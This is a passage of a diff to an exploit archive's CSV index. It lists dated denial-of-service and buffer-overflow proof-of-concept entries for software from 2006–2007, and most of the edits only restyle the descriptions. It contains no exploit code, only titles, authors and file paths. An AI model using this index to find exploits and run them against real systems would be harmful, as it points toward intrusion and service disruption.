2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)",2006-08-18,vegas78,windows,dos,0 2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,nop,windows,dos,0 -2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 -2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos,0 +2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - FTP Request Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 +2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - 'USER' Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0 -2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0 +2303,platforms/multiple/dos/2303.html,"dsock 1.3 - 'buf' Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0 2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - GET Denial of Service",2006-09-08,n00b,windows,dos,0 -2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - (VML) Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0 -2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0 -2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 +2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - VML Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0 +2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - Duplicated Block Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0 +2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - IMG SRC Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,bsd,dos,0 2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,bsd,dos,0 @@ -401,69 +401,69 @@ id,file,description,date,author,platform,type,port 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos,0 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 -2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - (RCPT TO) Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 -2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - (ADODB Execute) Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 +2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - RCPT TO Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0 +2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 -2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 +2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - RCPT TO Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0 -2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 +2695,platforms/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",multiple,dos,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 -2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 +2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Remote Denial of Service",2006-11-04,CorryL,windows,dos,0 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0 -2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0 +2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - 'APPE' Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0 -2783,platforms/windows/dos/2783.html,"WinZip 10.0.7245 - (FileView ActiveX Control) Stack Overflow (PoC)",2006-11-14,prdelka,windows,dos,0 -2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - (MKD) Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 +2783,platforms/windows/dos/2783.html,"WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)",2006-11-14,prdelka,windows,dos,0 +2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 - 'MKD' Remote Denial of Service",2006-11-15,"Greg Linares",windows,dos,0 2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - 'Long Filename' Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 -2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - (Playlist) Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 +2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0 -2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - (ACE) Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 -2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - (CHM) Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 +2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0 +2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 -2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service",2006-12-09,rgod,windows,dos,0 +2901,platforms/windows/dos/2901.php,"FileZilla FTP Server 0.9.20b/0.9.21 - 'STOR' Denial of Service",2006-12-09,rgod,windows,dos,0 2910,platforms/multiple/dos/2910.txt,"Sophos AntiVirus - '.CHM' File Heap Overflow (PoC)",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos AntiVirus - '.CHM' Chunk Name Length Memory Corruption (PoC)",2006-12-10,"Damian Put",multiple,dos,0 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro AntiVirus - '.RAR' File Denial of Service (PoC)",2006-12-10,"Damian Put",multiple,dos,0 -2914,platforms/windows/dos/2914.php,"FileZilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service",2006-12-11,shinnai,windows,dos,0 -2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service",2006-12-11,poplix,hardware,dos,0 -2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0 +2914,platforms/windows/dos/2914.php,"FileZilla FTP Server 0.9.21 - 'LIST/NLST' Denial of Service",2006-12-11,shinnai,windows,dos,0 +2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service",2006-12-11,poplix,hardware,dos,0 +2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0 -2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0 +2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - 'LIST/NLST' Denial of Service",2006-12-13,shinnai,windows,dos,0 2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 -2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 +2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - DLL-load Hijacking Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - 'SIZE' Remote Denial of Service",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0 -2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service",2006-12-17,Necro,windows,dos,0 +2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - 'RETR' Remote Denial of Service",2006-12-17,Necro,windows,dos,0 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0 -2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 +2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - Unchecked Boundary Condition Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0 2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0 -2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0 +2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - ActiveX Control Denial of Service",2006-12-20,shinnai,windows,dos,0 2967,platforms/windows/dos/2967.cs,"Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service",2006-12-20,anonymous,windows,dos,0 -2972,platforms/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - (PORT) Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 +2972,platforms/windows/dos/2972.c,"BolinTech DreamFTP Server 1.0.2 - 'PORT' Remote Denial of Service",2006-12-21,InTeL,windows,dos,0 2978,platforms/windows/dos/2978.py,"XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service",2006-12-22,shinnai,windows,dos,0 -2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service",2006-12-23,gbr,windows,dos,0 +2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service",2006-12-23,gbr,windows,dos,0 3013,platforms/windows/dos/3013.py,"Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service",2006-12-25,h07,windows,dos,0 -3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 +3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - 'PRIVMSG' Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3030,platforms/windows/dos/3030.html,"RealPlayer 10.5 'ierpplug.dll' Internet Explorer 7 - Denial of Service",2006-12-28,shinnai,windows,dos,0 3034,platforms/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,windows,dos,0 3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service",2006-12-29,rgod,windows,dos,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 'SwDir.dll' Internet Explorer 7 - Denial of Service",2006-12-29,shinnai,windows,dos,0 3052,platforms/windows/dos/3052.c,"Microsoft Windows - 'Csrss.exe/winsrv.dll' NtRaiseHardError Double-Free",2006-12-31,"Ruben Santamarta",windows,dos,0 -3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - (Name) Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 -3069,platforms/osx/dos/3069.pl,"VideoLAN VLC Media Player 0.8.6 (PPC) - (udp://) Format String (PoC)",2007-01-02,MoAB,osx,dos,0 +3056,platforms/windows/dos/3056.pl,"Formbankserver 1.9 - 'Name' Remote Denial of Service",2006-12-31,Bl0od3r,windows,dos,0 +3069,platforms/osx/dos/3069.pl,"VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)",2007-01-02,MoAB,osx,dos,0 3078,platforms/windows/dos/3078.pl,"Acunetix WVS 4.0 20060717 - HTTP Sniffer Component Remote Denial of Service",2007-01-04,nitr0us,windows,dos,0 -3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - (XML title) Remote Format String (PoC)",2007-01-04,MoAB,osx,dos,0 +3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - XML Title Remote Format String (PoC)",2007-01-04,MoAB,osx,dos,0 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 @@ -475,7 +475,7 @@ id,file,description,date,author,platform,type,port 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0 3138,platforms/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - 'GET' Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 -3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 +3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos,0 3151,platforms/osx/dos/3151.rb,"Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 3155,platforms/windows/dos/3155.html,"BrowseDialog Class 'ccrpbds6.dll' Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos,0 @@ -494,7 +494,7 @@ id,file,description,date,author,platform,type,port 3230,platforms/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities",2007-01-30,MoAB,osx,dos,0 3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service",2007-02-01,Shirkdog,windows,dos,0 3254,platforms/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)",2007-02-02,shinnai,windows,dos,0 -3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service",2007-02-02,poplix,osx,dos,0 +3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - 'NULL-pointer' Remote Denial of Service",2007-02-02,poplix,osx,dos,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3276,platforms/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 3277,platforms/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos,0 @@ -506,7 +506,7 @@ id,file,description,date,author,platform,type,port 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,windows,dos,0 -3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 +3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)",2007-02-20,Marsu,windows,dos,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities",2007-02-21,shinnai,windows,dos,0 3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 @@ -517,29 +517,29 @@ id,file,description,date,author,platform,type,port 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String",2007-03-02,"Luigi Auriemma",windows,dos,0 3404,platforms/multiple/dos/3404.php,"PHP 5 - 'wddx_deserialize()' String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0 3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0 -3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service",2007-03-05,mark,linux,dos,0 -3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0 +3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service",2007-03-05,mark,linux,dos,0 +3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - 'SwDir.dll' Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,windows,dos,0 3430,platforms/windows/dos/3430.html,"Adobe Reader Plugin 'AcroPDF.dll' 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 -3432,platforms/windows/dos/3432.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - (UDP) Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 +3432,platforms/windows/dos/3432.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos,0 -3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos,0 +3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - 'fragementation' Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)",2007-03-09,"Daniel Roethlisberger",linux,dos,0 -3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - (FTP Server Response) Denial of Service (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 +3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0 3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0 -3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0 +3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - Digest domain Denial of Service",2007-03-21,MADYNES,hardware,dos,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos,0 -3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 +3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - Long Directory Name Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 @@ -548,7 +548,7 @@ id,file,description,date,author,platform,type,port 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0 3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos,0 -3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service",2007-04-20,n00b,windows,dos,0 +3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - 'PDF' Remote Denial of Service",2007-04-20,n00b,windows,dos,0 3782,platforms/windows/dos/3782.pl,"Winamp 5.33 - '.avi' Remote Denial of Service",2007-04-23,DeltahackingTEAM,windows,dos,0 3784,platforms/multiple/dos/3784.c,"Opera 9.2 - '.torrent' Remote Denial of Service",2007-04-23,n00b,multiple,dos,0 3788,platforms/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos,0 @@ -558,7 +558,7 @@ id,file,description,date,author,platform,type,port 3792,platforms/hardware/dos/3792.pl,"Linksys SPA941 - Remote Reboot (Denial of Service)",2007-04-24,MADYNES,hardware,dos,0 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,linux,dos,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos,0 -3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service",2007-05-01,shinnai,windows,dos,0 +3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - ActiveX Control Denial of Service",2007-05-01,shinnai,windows,dos,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Denial of Service Vulnerabilities",2007-05-02,shinnai,windows,dos,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 3845,platforms/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Denial of Service 